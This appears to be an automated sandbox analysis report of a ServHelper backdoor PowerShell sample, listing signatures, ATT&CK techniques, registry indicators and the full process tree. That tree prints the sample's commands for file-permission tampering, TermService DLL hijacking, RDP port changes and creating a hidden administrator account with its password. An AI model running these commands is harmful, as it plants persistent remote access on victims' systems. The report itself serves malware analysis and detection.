servhelper | fda3497d316553432df108a4f9d5e71c65577e89a8cb0283914c9eec058af6df

Analysis

max time kernel
141s
max time network
136s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
06-02-2022 20:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fda3497d316553432df108a4f9d5e71c65577e89a8cb0283914c9eec058af6df.ps1
Size

2.5MB
MD5

869fe194f8f03c8286c2eda3ff0f80a1
SHA1

e79eeafe149ddccd7d907035442f8c4072237b68
SHA256

fda3497d316553432df108a4f9d5e71c65577e89a8cb0283914c9eec058af6df
SHA512

41de9b349240fd4c4997c7d9df6b349f43d38c2c74e31384c01861be5b69d643d8825ea1a21f6540036fa714e3d904a6a0089abdce2b42f4764d6388143ec453

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
544	takeown.exe
636	icacls.exe
1468	icacls.exe
3024	icacls.exe
2940	icacls.exe
2964	icacls.exe
1292	icacls.exe
3600	icacls.exe

Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x00080000000220fd-180.dat	upx
behavioral2/files/0x0007000000022100-181.dat	upx

Loads dropped DLL 2 IoCs

pid	Process
2084	Process not Found
2084	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
2964	icacls.exe
1292	icacls.exe
3600	icacls.exe
544	takeown.exe
636	icacls.exe
1468	icacls.exe
3024	icacls.exe
2940	icacls.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 9 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\State\keyValueLKG.dat	svchost.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MusNotifyIcon.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MusNotifyIcon.exe

Modifies data under HKEY_USERS 47 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "3960"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132888277518289302"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4116"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "1.685396"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.006582"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0"	svchost.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1696	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
1800	powershell.exe
1800	powershell.exe
1256	powershell.exe
1256	powershell.exe
3896	powershell.exe
3896	powershell.exe
1356	powershell.exe
1356	powershell.exe
1800	powershell.exe
1800	powershell.exe
1800	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
656	Process not Found
656	Process not Found

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeDebugPrivilege	1800	powershell.exe
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeDebugPrivilege	3896	powershell.exe
Token: SeDebugPrivilege	1356	powershell.exe
Token: SeRestorePrivilege	1468	icacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1800 wrote to memory of 616	1800	powershell.exe	58
PID 1800 wrote to memory of 616	1800	powershell.exe	58
PID 616 wrote to memory of 808	616	csc.exe	59
PID 616 wrote to memory of 808	616	csc.exe	59
PID 1800 wrote to memory of 1256	1800	powershell.exe	61
PID 1800 wrote to memory of 1256	1800	powershell.exe	61
PID 1800 wrote to memory of 3896	1800	powershell.exe	66
PID 1800 wrote to memory of 3896	1800	powershell.exe	66
PID 1800 wrote to memory of 1356	1800	powershell.exe	69
PID 1800 wrote to memory of 1356	1800	powershell.exe	69
PID 1800 wrote to memory of 544	1800	powershell.exe	73
PID 1800 wrote to memory of 544	1800	powershell.exe	73
PID 1800 wrote to memory of 636	1800	powershell.exe	74
PID 1800 wrote to memory of 636	1800	powershell.exe	74
PID 1800 wrote to memory of 1468	1800	powershell.exe	75
PID 1800 wrote to memory of 1468	1800	powershell.exe	75
PID 1800 wrote to memory of 3024	1800	powershell.exe	76
PID 1800 wrote to memory of 3024	1800	powershell.exe	76
PID 1800 wrote to memory of 2940	1800	powershell.exe	77
PID 1800 wrote to memory of 2940	1800	powershell.exe	77
PID 1800 wrote to memory of 2964	1800	powershell.exe	78
PID 1800 wrote to memory of 2964	1800	powershell.exe	78
PID 1800 wrote to memory of 1292	1800	powershell.exe	79
PID 1800 wrote to memory of 1292	1800	powershell.exe	79
PID 1800 wrote to memory of 3600	1800	powershell.exe	80
PID 1800 wrote to memory of 3600	1800	powershell.exe	80
PID 1800 wrote to memory of 4044	1800	powershell.exe	81
PID 1800 wrote to memory of 4044	1800	powershell.exe	81
PID 1800 wrote to memory of 1696	1800	powershell.exe	82
PID 1800 wrote to memory of 1696	1800	powershell.exe	82
PID 1800 wrote to memory of 3904	1800	powershell.exe	83
PID 1800 wrote to memory of 3904	1800	powershell.exe	83
PID 1800 wrote to memory of 832	1800	powershell.exe	84
PID 1800 wrote to memory of 832	1800	powershell.exe	84
PID 832 wrote to memory of 3424	832	net.exe	85
PID 832 wrote to memory of 3424	832	net.exe	85
PID 1800 wrote to memory of 1176	1800	powershell.exe	86
PID 1800 wrote to memory of 1176	1800	powershell.exe	86
PID 1176 wrote to memory of 1180	1176	cmd.exe	87
PID 1176 wrote to memory of 1180	1176	cmd.exe	87
PID 1180 wrote to memory of 3856	1180	cmd.exe	88
PID 1180 wrote to memory of 3856	1180	cmd.exe	88
PID 3856 wrote to memory of 1340	3856	net.exe	89
PID 3856 wrote to memory of 1340	3856	net.exe	89
PID 1800 wrote to memory of 1068	1800	powershell.exe	90
PID 1800 wrote to memory of 1068	1800	powershell.exe	90
PID 1068 wrote to memory of 1948	1068	cmd.exe	91
PID 1068 wrote to memory of 1948	1068	cmd.exe	91
PID 1948 wrote to memory of 2276	1948	cmd.exe	92
PID 1948 wrote to memory of 2276	1948	cmd.exe	92
PID 2276 wrote to memory of 3432	2276	net.exe	93
PID 2276 wrote to memory of 3432	2276	net.exe	93
PID 796 wrote to memory of 628	796	cmd.exe	97
PID 796 wrote to memory of 628	796	cmd.exe	97
PID 628 wrote to memory of 2140	628	net.exe	98
PID 628 wrote to memory of 2140	628	net.exe	98
PID 3348 wrote to memory of 1356	3348	cmd.exe	101
PID 3348 wrote to memory of 1356	3348	cmd.exe	101
PID 1356 wrote to memory of 2484	1356	net.exe	102
PID 1356 wrote to memory of 2484	1356	net.exe	102
PID 1800 wrote to memory of 2900	1800	powershell.exe	104
PID 1800 wrote to memory of 2900	1800	powershell.exe	104
PID 1800 wrote to memory of 3336	1800	powershell.exe	107
PID 1800 wrote to memory of 3336	1800	powershell.exe	107

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\fda3497d316553432df108a4f9d5e71c65577e89a8cb0283914c9eec058af6df.ps1
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1800
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\utp3r1nm\utp3r1nm.cmdline"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:616
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES854A.tmp" "c:\Users\Admin\AppData\Local\Temp\utp3r1nm\CSC51BCFC5BDBA842D3B78321792B543BD3.TMP"
    3⤵
    PID:808
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1256
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1356
- C:\Windows\system32\takeown.exe
  "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:544
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:636
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  - Suspicious use of AdjustPrivilegeToken
  PID:1468
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3024
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2940
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:2964
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:1292
- C:\Windows\system32\icacls.exe
  "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
  2⤵
  - Possible privilege escalation attempt
  - Modifies file permissions
  PID:3600
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
  2⤵
  PID:4044
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
  2⤵
  - Modifies registry key
  PID:1696
- C:\Windows\system32\reg.exe
  "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
  2⤵
  PID:3904
- C:\Windows\system32\net.exe
  "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:832
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    PID:3424
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1176
- - C:\Windows\system32\cmd.exe
    cmd /c net start rdpdr
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1180
  - - C:\Windows\system32\net.exe
      net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3856
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        5⤵
        
        PID:1340
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1068
- - C:\Windows\system32\cmd.exe
    cmd /c net start TermService
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1948
  - - C:\Windows\system32\net.exe
      net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2276
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        5⤵
        
        PID:3432
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
  2⤵
  PID:2900
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
  2⤵
  PID:3336

C:\Windows\system32\MusNotifyIcon.exe
%systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
1⤵
- Checks processor information in registry
PID:1196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p
1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2184

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:796
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc 000000 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:628
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
    3⤵
    PID:2140

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc HhdYcL76 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3348
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc HhdYcL76 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1356
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc HhdYcL76 /add
    3⤵
    PID:2484

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1700
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  PID:4052
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:560

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD
1⤵
PID:544
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD
  2⤵
  PID:3328
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RIBCQUHQ$ /ADD
    3⤵
    PID:1648

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2828
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1912
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2644

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc HhdYcL76
1⤵
PID:1872
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc HhdYcL76
  2⤵
  PID:3860
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc HhdYcL76
    3⤵
    PID:1384

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1256-152-0x00000252A3D40000-0x00000252A3D42000-memory.dmp

Filesize
8KB

Download
memory/1256-156-0x00000252A3D46000-0x00000252A3D48000-memory.dmp

Filesize
8KB

Download
memory/1256-153-0x00000252A3D43000-0x00000252A3D45000-memory.dmp

Filesize
8KB

Download
memory/1800-147-0x00000158C1620000-0x00000158C182A000-memory.dmp

Filesize
2.0MB

Download
memory/1800-134-0x00000158C0D70000-0x00000158C0D92000-memory.dmp

Filesize
136KB

Download
memory/1800-146-0x00000158C1290000-0x00000158C1406000-memory.dmp

Filesize
1.5MB

Download
memory/1800-172-0x00000158C0CF8000-0x00000158C0CF9000-memory.dmp

Filesize
4KB

Download
memory/1800-138-0x00000158C0CF6000-0x00000158C0CF8000-memory.dmp

Filesize
8KB

Download
memory/1800-137-0x00000158C0CF3000-0x00000158C0CF5000-memory.dmp

Filesize
8KB

Download
memory/1800-136-0x00000158C0CF0000-0x00000158C0CF2000-memory.dmp

Filesize
8KB

Download
memory/3896-163-0x0000025CDAD80000-0x0000025CDAE70000-memory.dmp

Filesize
960KB

Download
memory/3896-164-0x0000025CDAD80000-0x0000025CDAE70000-memory.dmp

Filesize
960KB

Download
memory/3896-165-0x0000025CDAD80000-0x0000025CDAE70000-memory.dmp

Filesize
960KB

Download